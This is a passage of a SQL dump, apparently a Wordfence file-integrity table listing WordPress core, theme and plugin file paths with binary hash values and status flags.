','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v}P�`~��|$�7�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��2�<9Ѿ�_J�','�xSh���IcU9�X�<FfjT\'h�چ��D�','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�L\0�4Wd�n�tG��','X\\�m��ؓ�>^\'�_4У��4ԗ����uV0','',0,'?'),('v�d�y��_{m�q�','wp-content/themes/doctors/core/contents/loop_attachment/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V���S���W��q','hrjO\0��pc�i�~� n]�%=\\kZ�v�\n+c(','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('v�����v̞e�tѿ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Oa��Y�?ai�0@6','\r�L&ބ��\0�}����mu�LJ���i..5G��l','',0,'?'),('v�w�5�,Ϙ��%g','wp-content/themes/skt-toothy/images/list-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q|�����p���','�m�dw��[���I�6��YS%�{�BMk�V�','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������8��B#','���{)�\"�;?�ϙXGDI�RD?K@^X���P','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��l� ճ=���}�','����40Y0ĽH��8���{V�7(@��0','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('w�n���bn��?ވ','wp-content/themes/wp-barrister/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�6C�j��c[G��$9�','�Y���EX_�m�y�d��ٛs�d���W_�','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('w\Z���z��\'��x1A','wp-content/themes/doctors/core/contents/loop_comments/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�T��\\��z','��>p�E�YC��.����s�+ ���R�','',0,'?'),('w%=-�����Αʹ�','wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/css/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�Q�J~W�;�M','|��\'ftџ�i4i唐F�d�@����=v','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wDZ/�I�E�20y ק','wp-content/plugins/wp-cerber/assets/flags/pf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����\'�>�Gx��:�',' �5�C����}Z��;�T��q,H-�˻�','',0,'?'),('wS=�0�<qT�$Æ�5�','wp-content/themes/weblog/acmethemes/sidebar-widget/acme-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i����G�B��@C��','�]Z��hbJƈ\"F�=��)$��|i�:̷','',0,'?'),('w^�a�#��5��E','wp-content/themes/wp-barrister/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*2C��\rC�K','2J���k�X@�(�L_,�p���LO�\0��','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('w~c�9G]N�aF��\0�','wp-content/plugins/redirection/locale/json/redirection-ja.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[?b��N`՜㢭c=','mNe����Ԏ��h��rFl]�wE�,��o!�','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w�|�r.Wx\"\"0V�0��','wp-content/themes/wp-barrister/library/images/icon-ye.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4IV��ah*J��m',';����8(\r.��5io+=Ri98�u��s','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w�S����@��U��','wp-content/plugins/redirection/locale/redirection-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/O��u.��>���$�}�','bXīi�O�Z�9��4���aԩ\\�w��: \\\0$','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w�+� \\n�����j','wp-content/themes/regina-lite/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&{���tF��Q��','zhX3\'��)<uq���$���j|��Ei\n���','',0,'?'),('w��\\��A^��V�N$^','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�Wi,>�z�','4��3ײ>b/?�Rx��ʚ?;��Z��7�R�','',0,'?'),('x G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eVT`N6bqIO7�M\n���^�8','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9','; �_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҹ�h�4q�paT0��','̡��pr\n��Y���aZ|�i�S��,��/��','',0,'?'),('x��\\��\0v�`�%�]�','wp-content/plugins/redirection/fileio/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�T\Z<k�2\\�Q�i��','�Gr��\r� ���R@蒜��d\\��)M�UT7��','',0,'?'),('x��n�8I�Y���1�','wp-content/themes/twentynineteen/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6��7������p','����X��:*�N�Y�/���\"�d�[Ï��','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�yڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����A�<_\r^،','-өw�r��\n�ϸ�`�g-7�����.�c�?�','',0,'?'),('y:�ˀ��!���cB�','wp-content/themes/regina-lite/layout/js/plugins/pace/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('y=�[F`�o�\" ��+�','wp-content/themes/healthcare/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' }�������Z5�','(���(�c��Ù����;�H=O$H�#��','',0,'?'),('y?�B�`F�UIGtL<','wp-content/themes/regina-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?-��<ܩ7{s��','�&�\\�mcLra�ƕ=�u`\n���-�^a/Zű','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN �','',0,'?'),('yy}$�n���I���','wp-content/themes/wp-barrister/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ރ�J+\n܋�00�P','��]�w%��o\'UQ��#M�ގ��P?֟a','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�h,����Z�����','wp-content/themes/healthcare/css/font-awesome/less/path.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�*O��P��?','�V���?��-,�f�.��{��D؏c|��','',0,'?'),('y�&�eW�K6�]��H�','wp-content/plugins/wp-cerber/assets/flags/br.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ն=Xo�#','�l�YC��#�fݽ�\Z\'4�� fk>�χO��}','',0,'?'),('y�5�7!�g��� ','wp-content/themes/twentynineteen/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uܥ�֭�=�\\�M��U�','��0]L\0��W����=,�[��}|����\\�','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�s7S`�G���UI�','�i�\"ă�;]���HY��;z�,n����P^Z[\'J�','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�c$Koʛd\\\ni�7�','���h�\"��y��K\'� <�v�mZ9Qg�','',0,'?'),('z\rR2nLS�k��','wp-content/plugins/redirection/api/api-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�N�Gּ/�o��','�W���=6���#��%̿�����9��','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ss#V����͓h�C�','XDx�ޭ7豽Hs�E��k]����\Z���i\'��','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3��mi䙶�&�','�����U�?6RA鲣�����R�)b�n8�','',0,'?'),('z@���z�[P�ѐ�','wp-content/plugins/wp-cerber/assets/flags/rw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ľ�C��6���ޯ�L�','y\n<P�^5z��g�\\\"�f\\�S�p8��1s','',0,'?'),('zC{ �$\Z����o','wp-content/themes/wp-barrister/library/images/icon-gp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?g�Tq\ng%�)���','�j��\0��ZL~��0�Y�N����XV�','',0,'?'),('z]��Őx�\'!*[,��','wp-content/plugins/wp-cerber/assets/flags/ar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IauKc� ���io1','R�2�$��͗�[��G`�d�;TC\0ԙ���U','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q>�<�H[AYܝ\n���','��{p2�J�+-��%�.�G#�rpE�]>���','',0,'?'),('z��sDF��wPþ,�','wp-content/plugins/redirection/locale/redirection-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�_��~E�e.�/','�C¼�<����ϛ��u�C��k�Ϊ��2�','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5 g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���l&��\0G�c',',�� �ۗ*u�K\\����A����������wD�','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('z���;e\rrqY���|','wp-content/themes/vision-lite/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e��S%��$T�bB','����)N0�:��Jot\n^Xnl��:��e\\�\r','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('zۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('{�w���h�Z���1��','wp-content/themes/advance/inc/kirki/assets/js/controls/generic.js',0,'a�ZmV� N�Ш|)R','a�ZmV� N�Ш|)R','ʦ�2����4{�%r���m��s9���','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��P�N��P�','H+T9���h�m�)L���(��u�Z^dH�','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pg���!��/�՝','�, X6�!צ6�H�%�=98�`�y��nj�-','',0,'?'),('{N���2�Q�u��= �','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{q�qI\Zr(� ���','wp-content/themes/weblog/acmethemes/customizer/custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���YQ�*��(ǿ��','�M)�\'�}�H�U�}���Z#~\"�4p� ��','',0,'?'),('{;�� ]@G�J,~���','wp-content/themes/healthcare/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0t�1��I߅�','��L d1�7�|�nq��+��)M>Aa�fڭ','',0,'?'),('{=ا�{��\no}]v�','wp-content/plugins/wp-cerber/assets/flags/sa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]pڌE�YYz�ٶ','�����0��{A�3�HX�~��z��\nT�','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���X�\'��]2�!','����~�X\0I��8�w,��NÃ�}v7��C','',0,'?'),('{l�&��٤�n��(�','wp-content/themes/vision-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X7e\"���ȇ!�B�','\0*G�.�^ؒn�g�$_��c�CG���\"M�','',0,'?'),('{o��/�o�h9�a��','wp-content/plugins/wp-cerber/assets/flags/ve.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���^ٔwX�c�','Z��\\[.�M���q��2]l�AL��Jf���C','',0,'?'),('{p!1��Z]KMC�*!','wp-content/plugins/redirection/locale/redirection-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ȁ�j\";v�Z�','�>�w@e?��d�t1ƽ5D�,:����GQf�5','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P9�6�Z3\'2���>','�v�t&�����h3�C���9)�L��9Ub�Ki','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǯ ��f/,d%eU�','�Q��;����\Z�4o_�{����\nϠ�q\"Q�r','',0,'?'),('{{�j��z���G|c�H�','wp-content/themes/weblog/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E����m�FU�H��w','��tR���u:�����W��ڝ�`�\"�Z','',0,'?'),('{�j�ɏ|n� ^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('{���M8��\r�hDp�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/sections/pro-section.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�n\\�#Mhk�','hE�@ۨ`Mʂ�a���C���3֚���','',0,'?'),('{�4�O;{\'$2dț�O','wp-content/themes/twentytwenty/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y)G�.�\'','5H?%��)�JzI<Y�6�WJ2�I���d�','',0,'?'),('{�1�9�+sh���','wp-content/plugins/wp-cerber/assets/flags/gp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CG_t?���9�rK','��hd0)m�3�a�ͱQ�D�V�����}�','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z2�j��(=iSM�IV�','\Z�/������\'\\��.�� 7�����3','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����~FՕ��','H,=�!B�=�?��Op`K˄�`�^�y!���','',0,'?'),('|��Z!pf�-b`�','wp-content/themes/doctors/core/assets/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��� J�;�Ek',',S��`d����\\Y|�l��r�4�Y�ʊ:k�g','',0,'?'),('|\rl?D_�m�d� Y�x','wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&D�_F#�I!���','�R��g����[>{��e�\n�ژx�1��R�','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xh�v�iy��.��','C~S����|��8R�wK@�_�J��m�','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|4,��\r\"ɱ�؊��o','wp-content/plugins/redirection/api/api-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�\"�����1%��','��j��ߢ��c��k�Lпj��:��H0[\0�','',0,'?'),('|8Ȍ�b=T,���:�E','wp-content/themes/healthcare/css/font-awesome/less/font-awesome.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C|/�5��','\Z�qD�,R�Y5�V\'�C\'�B\r\n{�@�74�%','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�?�v��\\����$','z����.t(���C�o��� ���tV�','',0,'?'),('|p6: �W��S76P[�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-link.php',0,'��!.ξ�������','��!.ξ�������','13� �=�>���zk/��&�ڍ|��\ZR�]�','',0,'?'),('|�\\��χGZ�U�','wp-content/themes/regina-lite/inc/libraries/class-regina-notify-system.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R����Y�r���','k�\n��]���v�o9�n��8龣Y�O`%�','',0,'?'),('|�3�=#zJ;�$�O�jh','wp-content/plugins/redirection/matches/user-agent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tO���C�\r�^�J','��{�:�����ϳuoɗV�)�S}�m�l[�/�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D&fAД��E��~','{���h;[�5��0` Vz��Kd�����^,h�','',0,'?'),('|š�u��_�\0cx�6�','wp-content/themes/advance/content.php',0,'���%J��[U˅V��o6','���%J��[U˅V��o6','ϕ�|����XY�N��l��(� ���Z��;��','',0,'?'),('|����f�lG��P�.','wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"W:]��`A\"e�:�Ս','�&�?�~����ur��4�Ў�[����z^','',0,'?'),('|��T]��:Y$=\'h�','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��Gy�d�7?��_�','�3�7!��|�����%�e��k�6XL','',0,'?'),('|��Y�>�� �Ɔ�','wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�!\'ljP��^kI��','�5:���q��φR_\\y���h�\rLIl���','',0,'?'),('}ĉ=�t�����','wp-includes/images/toggle-arrow-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('}7:\"y�ڣ�����','wp-content/themes/healthcare/css/font-awesome/less/icons.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����kdo�W7��ڔ�','�)ȝ����\\\\d�&�QΊ�4�3||���I��w�','',0,'?'),('}L;��],����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,(�[�\0�b��۪��z','�)�Y|\nA0a���\r�%in���ߞkMjC\'��','',0,'?'),('}O� !ٶ]�O�O[�','wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��veY�\Z��f�','�B��tٯ�@�^���5��N���XȆ<','',0,'?'),('}\\�5�\r��$�l�W���','wp-admin/js/tags-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��D��B�aB�*','$Y�Xx��93%��ftC0y�,�^���\n','',0,'?'),('}`��g\"P�2��V��','wp-includes/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6����� B��4�6','',0,'?'),('}�7 ޘ�DHD�Pl','wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('}�HJ�1�%�`��','wp-content/themes/twentytwenty/template-parts/modal-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#g��:�N6Ȱ\\qW','�� ^+z:%,��1z�(�\Z�\'|��T�9��J','',0,'?'),('}�l}%CK�c}�NH��\Z','wp-content/plugins/wp-cerber/assets/flags/gr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\0�$��*0B�֏*�','����,DZ��W?������l�G��k��Qq','',0,'?'),('}��1��SJr��','wp-content/themes/advance/inc/kirki/includes/class-kirki-field.php',0,'%\n�)r:�%���O�','%\n�)r:�%���O�',' 